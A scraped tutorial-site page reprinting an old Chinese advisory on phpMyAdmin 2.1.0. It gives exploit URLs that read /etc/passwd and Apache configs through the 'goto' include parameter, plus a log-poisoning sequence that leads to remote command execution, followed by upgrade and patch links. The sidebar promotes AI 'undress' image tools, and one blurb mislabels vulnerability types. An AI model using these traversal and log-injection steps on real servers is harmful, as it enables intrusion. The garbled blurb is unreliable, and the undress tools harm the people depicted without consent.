Heim Backend-Entwicklung PHP-Tutorial phpMyAdmin2.1.0存在两个漏洞_PHP教程

phpMyAdmin2.1.0存在两个漏洞_PHP教程

Jul 13, 2016 pm 05:09 PM
http p phpmyadmin 存在 漏洞

phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/629808.htmlTechArticlephpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装...
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Heiße KI -Werkzeuge

Undresser.AI Undress

Undresser.AI Undress

KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover

AI Clothes Remover

Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool

Undress AI Tool

Ausziehbilder kostenlos

Clothoff.io

Clothoff.io

KI-Kleiderentferner

AI Hentai Generator

AI Hentai Generator

Erstellen Sie kostenlos Ai Hentai.

Heißer Artikel

R.E.P.O. Energiekristalle erklärten und was sie tun (gelber Kristall)
4 Wochen vor By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Beste grafische Einstellungen
4 Wochen vor By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. So reparieren Sie Audio, wenn Sie niemanden hören können
4 Wochen vor By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Chat -Befehle und wie man sie benutzt
4 Wochen vor By 尊渡假赌尊渡假赌尊渡假赌

Heiße Werkzeuge

Notepad++7.3.1

Notepad++7.3.1

Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 chinesische Version

SublimeText3 chinesische Version

Chinesische Version, sehr einfach zu bedienen

Senden Sie Studio 13.0.1

Senden Sie Studio 13.0.1

Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver CS6

Dreamweaver CS6

Visuelle Webentwicklungstools

SublimeText3 Mac-Version

SublimeText3 Mac-Version

Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

So legen Sie den Primärschlüssel in phpmyadmin fest So legen Sie den Primärschlüssel in phpmyadmin fest Apr 07, 2024 pm 02:54 PM

Der Primärschlüssel einer Tabelle besteht aus einer oder mehreren Spalten, die jeden Datensatz in der Tabelle eindeutig identifizieren. Hier sind die Schritte zum Festlegen eines Primärschlüssels: Melden Sie sich bei phpMyAdmin an. Wählen Sie Datenbank und Tabelle aus. Markieren Sie die Spalte, die Sie als Primärschlüssel verwenden möchten. Klicken Sie auf „Änderungen speichern“. Primärschlüssel bieten Datenintegrität, Suchgeschwindigkeit und Vorteile bei der Beziehungsmodellierung.

So fügen Sie Fremdschlüssel in phpmyadmin hinzu So fügen Sie Fremdschlüssel in phpmyadmin hinzu Apr 07, 2024 pm 02:36 PM

Das Hinzufügen eines Fremdschlüssels in phpMyAdmin kann durch die folgenden Schritte erreicht werden: Wählen Sie die übergeordnete Tabelle aus, die den Fremdschlüssel enthält. Bearbeiten Sie die übergeordnete Tabellenstruktur und fügen Sie unter „Spalten“ neue Spalten hinzu. Aktivieren Sie Fremdschlüsseleinschränkungen und wählen Sie die referenzierende Tabelle und den Schlüssel aus. Legen Sie Aktualisierungs-/Löschvorgänge fest. Änderungen speichern.

Wo gibt es die WordPress-Datenbank? Wo gibt es die WordPress-Datenbank? Apr 15, 2024 pm 10:39 PM

Die WordPress-Datenbank ist in einer MySQL-Datenbank untergebracht, die alle Website-Daten speichert und auf die über das Dashboard Ihres Hosting-Anbieters, FTP oder phpMyAdmin zugegriffen werden kann. Der Datenbankname bezieht sich auf die URL oder den Benutzernamen der Website und der Zugriff erfordert die Verwendung von Datenbankanmeldeinformationen, einschließlich Name, Benutzername, Passwort und Hostname, die normalerweise in der Datei „wp-config.php“ gespeichert sind.

So löschen Sie eine Datentabelle in phpmyadmin So löschen Sie eine Datentabelle in phpmyadmin Apr 07, 2024 pm 03:00 PM

Schritte zum Löschen einer Datentabelle in phpMyAdmin: Wählen Sie die Datenbank und die Datentabelle aus. Klicken Sie auf die Option „Löschen“.

Zu welcher Art von Sicherheitslücke gehört die phpmyadmin-Sicherheitslücke? Zu welcher Art von Sicherheitslücke gehört die phpmyadmin-Sicherheitslücke? Apr 07, 2024 pm 01:36 PM

phpMyAdmin ist anfällig für mehrere Schwachstellen, darunter: 1. Schwachstelle durch SQL-Injection (XSS); 3. Schwachstelle durch Remotecode-Ausführung (LFI); 5. Schwachstelle bei der Offenlegung von Informationen; Sicherheitslücke; 6. Sicherheitslücke bezüglich der Rechteausweitung.

Was soll ich tun, wenn Navicat keine Verbindung herstellen kann? Was soll ich tun, wenn Navicat keine Verbindung herstellen kann? Apr 23, 2024 am 10:00 AM

Wenn Navicat keine Verbindung herstellen kann, können Sie die folgenden Lösungen der Reihe nach ausprobieren: Überprüfen Sie, ob die Verbindungsinformationen korrekt sind, z. B. Datenbankname, Hostname, Portnummer, Benutzername und Passwort. Stellen Sie sicher, dass die Datenbank betriebsbereit ist. Überprüfen Sie die Firewall-Regeln, um sicherzustellen, dass Navicat und zugehörige Dienste nicht blockiert werden. Versuchen Sie, Ihre Netzwerkverbindung mit dem Ping-Befehl zu testen. Aktualisieren Sie die Navicat-Client-Software auf die neueste Version. Überprüfen Sie die Serverprotokolle auf Fehlermeldungen im Zusammenhang mit fehlgeschlagenen Verbindungen. Versuchen Sie, eine Verbindung mit anderen Datenbanktools herzustellen, um Navicat-spezifische Probleme zu beheben.

So exportieren Sie Excel mit phpmyadmin So exportieren Sie Excel mit phpmyadmin Apr 07, 2024 pm 02:24 PM

Daten über phpMyAdmin in das Excel-Format exportieren: Nachdem Sie sich bei phpMyAdmin angemeldet haben, wählen Sie die zu exportierende Datenbank und Tabelle aus. Klicken Sie auf die Option „Exportieren“ und wählen Sie im Dropdown-Menü „Format“ die Option „Excel“. Wählen Sie Ihre eigenen Exportspalten, Abfrageoptionen und andere Exportoptionen. Klicken Sie auf die Schaltfläche „Dump“, um den Export zu starten und die exportierte Excel-Datei herunterzuladen.

So ändern Sie das Standardkennwort von Empire CMS So ändern Sie das Standardkennwort von Empire CMS Apr 16, 2024 pm 03:21 PM

Setzen Sie das Empire CMS-Standardkennwort mit den folgenden Schritten zurück: Melden Sie sich bei der Datenbank an und suchen Sie die Benutzertabelle. Bearbeiten Sie den Administratorbenutzer (Benutzername ist admin). Ändern Sie den Wert im Passwortfeld. Speichern Sie die Änderungen und melden Sie sich mit dem neuen Passwort am Management-Backend an.

See all articles